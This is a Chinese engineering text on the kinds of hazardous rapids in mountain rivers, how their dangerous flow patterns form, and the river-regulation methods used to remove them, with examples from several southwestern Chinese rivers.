险滩之所以险峻碍航,威胁船舶航行安全,主要是由于存在复杂的地形条件,及其相应不良的水流流态,常见的如泡漩水,滑梁水和扫弯水等 归纳各地情况,大体上有以下类型 弯急槽窄弯曲半径不足船舶长度的3倍,航道宽度也不富裕,甚至只能勉强达到单线航宽标准 这种急弯窄槽在山区定是险滩无疑,即使是在平原也属险段,非裁直拓宽不可,如广东东平水道的大刀湾、西江出海航道的横坑等 在山区河流这种急弯槽窄航道往往还伴有扫弯水,其危险性更大,如广西红水河的十五滩,蓬莱滩左汉的天平针等 岸嘴突兀一种是河道轮廓不一定是急弯,但两侧岸嘴交替伸出,或为石嘴,矶头,或为硬粘土,航道本来不宽,岸嘴又加大其曲折程度,这种河道地形对于行轮,无论在山区,在平原都是妨碍航行安全的 另一种是在山区的枯水弯槽,凹岸一侧有岸嘴外伸,致使航线弯曲,又有泡漩水形成,船舶过此极易酿成海事 礁石林立这种河道地形在山区是常见的 有的是礁石散布在航道或两侧,船舶左右都要提防险触礁石,如以往川江著名险滩峻岭(另称“鬼门关”),有的是航道内有暗礁,船舶时时担心划破船底,如重庆以上未经整治时的莲石三滩,西津电站下游整治前的鸡几滩等 砥柱中流这也是山区河道常有的 有的是主流区内存在孤立而高大的礁石,中洪水期水流急乱,泡漩翻滚,如奉节白帝城下的浇弱堆有的是中洪水季主流路上有江心石梁斜卧,或由岸边伸出淹没后,形成滑梁水或泡漩乱流 船舶对这些地方往往视为畏途 泡漩水险滩(1)泡漩水碍航特点 船舶(队)行经泡水区受泡水散力作用被推向一边,偏离航线,造成歪船、扎驳、断缆或覆倾沉没,强烈泡漩水相伴产生,危害更大 (2)泡漩水形成机理 山区河流河道上因地形平面、立面或两者都有的突变,形成强烈的底部上升水流,涌出水面为泡水;急函下潜水流和缓流间摩擦作用形成下凹形漩流为漩水 泡漩水是水流动能转换成位能出现的水流变化现象 (3)泡漩水形成基本条件主要有三:①急湍水流为形成泡水必要的动力条件 ②地形变化突兀,在急剧水流作用下形成急速上升水流,显示强烈的三维特性 ③适当的水深 (4)泡漩水的表现形式主要有3种:①连珠式泡水,俗称”连珠泡”;②间歇式泡水,是常见的泡水;③阵发式泡水,俗称“冷泡”,与间歇性相似 (5)形成泡漩水的特殊地形 特殊地形大体概括为:①一侧突咀;②两个或多个突咀;③局部急弯;④河心孤礁(明礁、暗礁);⑤峡口下游反坡 滑梁水险滩水流漫过河岸斜向河床的石梁或基础台地,水流向水位低的一侧溢过的水流为滑梁水 当梁上或台上水深不足设计水深时,船舶航行不慎,有被横向水流推至梁上发生触礁危险 如果两岸有滑梁水,而航宽较狭窄时,危险更大 滑梁水区还有可能造成不能设标,或航标流失而发生海事 扫弯水险滩由于河槽弯曲,强烈的弯道环流使凹岸一侧冲刷成深槽,而深槽的吸流作用,又加剧面层主流冲向凹岸,形成贴岸而下的斜流,称扫弯水 扫弯水主要对下行船舶危害较大,河槽弯曲,航深弯曲半径小河面又不够宽,下行船舶航行时,如偏向凸岸,易在凸岸边擦浅,过偏于凹岸,易产生扫弯事故 因凸岸边滩挑流,一方面使主流收缩直冲凹岸,另方面在凸咀边滩下游形成较大回流区,使上、下航行船舶发生“打张”和“打俄”事故 对于上浅、下险的扫弯险滩,由于上段浅,船舶为减小吃水避免擦浅不能加大马力行驶,影响船舶操纵性能,船舶更易被斜向水流冲向凹弯河段而发生触礁事故 水流在弯曲河段上运动,受离心力作用,凹岸水面升高,凸岸水面低 水流压力作用,形成贴岸斜流 离心力与水流反量成正比,和研究该点河道弯曲半径成反比,和流速的平方成正比 弯曲半径越小,水流量越向凹岸集中,凹岸水位越高,斜流就越大 因此当航槽弯曲半径小,航宽不满足船舶航迹带宽度要求时,船舶扫弯触礁 各类滩险整治方法按碍航特点分,石质险滩可以分成礁石险滩和不良流态的泡漩水险滩、滑梁水险滩和扫弯水险滩 礁石险滩主要由于地质构造原因,在岸边或江床中存在各种形态的明暗礁石,使航槽狭窄、弯曲,船舶航行其间,极易角触礁事故 碍航情况比较明了,整治方法主要炸礁清障 在规划设计整治的航宽度内,清除礁石,扩大通航尺度 如果礁石险滩因礁石分布形成两汉,则规划航线,以一槽通航为主,并顺应河势要求 没有特殊要求不必两槽通航 根据泡漩水形成机理,泡漩水险滩整治方法,主要是炸除突咀、清理河床、平整岸线,或布置整治建筑物调整水流流向和流速分布,消除形成水流能量转换的各种因素 根据川江、乌江、西江、红水河等巧个泡漩水险滩分析,整治方法主要有以下3种 改变河床边界条件以改善碍航水流流态具体措施有:炸除突咀、清理河床、平顺岸线 例如乌江的七里滩整治,河道比较顺直,形成泡漩水原因是两岸有交错突咀,炸除突咀,切除挑流石盘,泡水减小,达到通航标准要求 改变成泡水流动力条件以减泡移泡具体措施有:(1)凹岸建丁顺坝,调整成泡水流方向 这种措施在航道宽度较大的河段实施有效 例如川江的折桅子滩,在突咀上游凹岸建丁顺坝后,急巫水流挑离凸咀,泡水消减并下移于航道外 而建丁顺段航道内流速增加有限,仍符合船舶安全航行要求 (2)扩散底流 在凸咀上游深槽建潜扩散成泡的底流,减小成泡坝和潜丁坝,水流冲击力,达到减泡移泡目的 例如川江的钩鱼咀险滩和雨丘石险滩,因航道较窄,在凸咀上游建丁坝后,建坝段航槽流速增大,形成碍航新滩,建潜坝后,底流扩散,泡水强度减小,泡水移于航槽外,达到安全航行目的 改变成泡边界条件同时,改变成泡水流动力条件(1)扩散剪刀水,调整流速分布 一些峡口河段,峡内两岸突咀,且河床纵向变化大,出口段有较大的反向纵坡 因突咀剪刀水压缩,面流下潜,较大的底流遇到反坡则急巫上升形成泡漩水 因此切除上游突咀及反坡附近岸边石梁,改变上边界条件,面流增大,则底流减小,因而泡强减小,达到整治目的,南津关泡水险滩就是采取这种整治措施获得成功的 (2)洲头建坝,拦截横流、拓宽主流 有一些卵石或沙卵石洲,付槽浅窄,不能通航,在中、枯水期水流从付槽一侧绕过洲头进人主航槽,横流极大,而且横流冲向对岸有礁石的航槽边沿,形成碍航泡漩水 对于这种水流特点,建洲头坝,拦截横流,即调整边界条件(洲头上延),同时改变水流方向达到改善航行水流条件的目的 川江的瓦窑滩等采取这种整治措施获得成功 如工程量不大,可尽量清炸除石梁、石盘以消除滑梁水;如因工程量过大消除滑梁水有困难,可采取筑坝或炸礁,改变滑梁水发生时间和空间,使船舶避开滑梁水 除了遵循各类险滩整治基本原则外,应详细进行滩性分析,以及各滩整治后可能发生的相互影响,抓住主要矛盾,因地制宜综合治理 对单一河段复杂险滩:①按通航标准,上、下兼顾,全面规划;②急险并存,治急消险或治险为主,改变急险状态;③按滩性分析,因地制宜综合治理 对于分汉河段复杂险滩,整治原则除和单一河段相似外,还要注意:①当流量充分,可开槽分流;②根据不同水期分汉通航;③主槽整治困难时,条件允许,可另辟新副槽通航
